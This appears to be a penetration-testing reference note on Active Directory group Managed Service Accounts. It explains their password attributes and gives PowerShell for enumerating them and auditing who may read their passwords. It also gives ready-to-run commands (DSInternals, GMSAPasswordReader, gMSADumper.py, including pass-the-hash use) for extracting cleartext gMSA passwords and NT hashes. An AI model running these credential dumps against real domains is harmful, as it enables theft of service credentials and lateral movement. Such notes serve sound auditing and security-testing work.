Active Directory - group Managed Service Accounts (gMSAs)

Overview

Introduced in Windows Server 2012, group Managed Service Accounts (gMSAs) are service accounts managed by the Active Directory domain services. gMSAs address a shortcoming of standalone Managed Service Accounts (MSA), that were introduced in Windows Server 2008, and were only usable on a single computer. gMSAs use 240-byte passwords, generated and periodically rotated - 30 days by default - by (writable) Domain Controllers using the domain Key Distribution Services (KDS) root key.

gMSAs created using the New-ADServiceAccount PowerShell cmdlet are by default placed in the default managed service accounts container (CN=Managed Service Accounts,<DOMAIN_ROOT>).

gMSAs are objects of class ms-DS-Group-Managed-Service-Account (subclass of Computer) with the following additional attributes:

• msDS-GroupMSAMembership (PrincipalsAllowedToRetrieveManagedPassword): defines which security principal(s) can retrieve the gMSA password (in the msds-ManagedPassword attribute). It corresponds to a security descriptor, with principal(s) having the right to retrieve the gMSA password being granted the RIGHT_DS_READ_PROPERTY access control right.

• msds-ManagedPassword: a MSDS-MANAGEDPASSWORD_BLOB that contains the gMSA's previous and current clear-text password, as well the expiration timers of the current password. The msds-ManagedPassword attribute is a constructed attribute, calculated by a (writable) Domain Controller upon each query using the Key Distribution Services (KDS) root key and the key identifiers.

• msDS-ManagedPasswordId and ms-DS-ManagedPasswordPreviousId: contain the key identifier used to compute, respectively, the current and previous password of the gMSA.

• ms-DS-ManagedPasswordInterval: contains the interval period in days under which the gMSA's password will be rotated. By default, the rotation period is 30 days.

gMSAs enumeration

The PowerShell ActiveDirectory module can be used to enumerate the gMSAs:

# Enumerates the gMSA in the domain.
Get-ADServiceAccount -Filter *
Get-ADObject -LDAPFilter "(objectClass=msDS-GroupManagedServiceAccount)" -Properties *

# Retrieves the principals allowed to retrieve gMSAs' password.
Get-ADServiceAccount -Filter * -Properties PrincipalsAllowedToRetrieveManagedPassword

# Retrieves the principals allowed to retrieve gMSAs' password and highlights potentially dangerous rights (simple analysis based on direct principal names matching).
$PrivilegedPrincipalsRegex = [string]::Join('|', @('CN=Domain Admins', 'CN=Enterprise Admins', 'CN=Domain Controllers'))
$UnprivilegedPrincipalsRegex = [string]::Join('|', @('CN=Domain Users', 'Everyone', 'CN=Domain Computers', 'Authenticated Users', 'Anonymous'))

Get-ADServiceAccount -Filter * -Properties PrincipalsAllowedToRetrieveManagedPassword | ForEach-Object {
    Write-Host -ForegroundColor DarkGreen -BackgroundColor White $_.SamAccountName
    Write-Host $_.DistinguishedName
    Write-Host $_.SID
    Write-Host "`n"

    Write-Host "PrincipalsAllowedToRetrieveManagedPassword:"
    foreach ($Principal in $_.PrincipalsAllowedToRetrieveManagedPassword) {
        If ($Principal -match $UnprivilegedPrincipalsRegex) {
            Write-Host -ForegroundColor Green $Principal
        }
        ElseIf ($Principal -match $PrivilegedPrincipalsRegex) {
            Write-Host -ForegroundColor Red $Principal
        }
        Else { Write-Host -ForegroundColor Yellow $Principal }
    }

    Write-Host "`n"
}

gMSAs ACL enumeration and msDS-GroupMSAMembership modification

Refer to the [ActiveDirectory] ACL exploiting note (group Managed Service Accounts (gMSA) section) for more information on techniques and tools to modify gMSAs's msDS-GroupMSAMembership attribute.

gMSAs password retrieval

Multiple tools and utilities can be used to retrieve a gMSA account password, and further derivate its NTLM / NTHash and Kerberos secrets (AES 128 and AES 256 keys):

# PowerShell ActiveDirectory and DSInternals modules.
# Import-Module "<PATH>\DSInternals.psd1"
$gMSA = Get-ADServiceAccount -Identity '<GMSA_NAME>' -Properties 'msDS-ManagedPassword'
$msDSMP_blob = $gMSA.'msDS-ManagedPassword'

# Decodes the MSDS-MANAGEDPASSWORD_BLOB data structure using the DSInternals module.
$CleartextPassword = ConvertFrom-ADManagedPasswordBlob $msDSMP_blob
$CleartextPassword

# Converts the cleartext password to the corresponding NTLM / NT hash using the DSInternals module.
# To compute the corresponding Kerberos secrets using the cleartext password, refer to the "[ActiveDirectory] Kerberos tickets usage" note.
ConvertTo-NTHash -Password $CleartextPassword.SecureCurrentPassword

# GMSAPasswordReader C# utility.
GMSAPasswordReader.exe --AccountName <GMSA_NAME>

# gMSADumper.py Python script and standalone compiled binaries.
gMSADumper.py -d <DOMAIN> -u <USERNAME> -p <PASSWORD>

# <LM_HASH | NT_HASH> if only the NT_HASH is known: 'aad3b435b51404eeaad3b435b51404ee:<NT_HASH>'
gMSADumper.py -d <DOMAIN> -u <USERNAME> -p <LM_HASH | NT_HASH>

# On Linux, Kerberos authentication using a Ticket-Granting-Ticket in the ccache format.
gMSADumper.py -k -d <DOMAIN> -u <USERNAME>

References

https://docs.microsoft.com/en-us/powershell/module/activedirectory/new-adserviceaccount

https://www.dsinternals.com/en/retrieving-cleartext-gmsa-passwords-from-active-directory/

https://it-central.fr/wp-content/uploads/2017/05/202938243-Comptes-et-groupes-de-services-VSA-MSA-gMSA-tuto-de-A-a-Z.pdf

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#readgmsapassword